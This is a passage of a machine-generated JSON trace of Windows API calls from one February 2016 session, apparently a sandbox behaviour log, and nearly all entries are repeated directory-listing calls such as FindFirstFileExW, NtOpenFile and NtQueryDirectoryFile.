"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,196", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,206", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,236", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,276", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": 
"FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,316", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", 
"api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", 
"api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,326", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,426", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": 
"2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": 
"filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,436", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,446", "api": "NtOpenFile"}, 
{"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,526", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": 
"NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 
17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "process", "timestamp": "2016-02-16 17:41:37,536", "api": "NtFreeVirtualMemory"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", 
"timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,536", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtOpenFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,576", "api": "NtQueryDirectoryFile"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "FindFirstFileExW"}, {"category": "filesystem", "timestamp": "2016-02-16 17:41:37,676", "api": "NtOpenFile"}, {"category": "filesystem", 
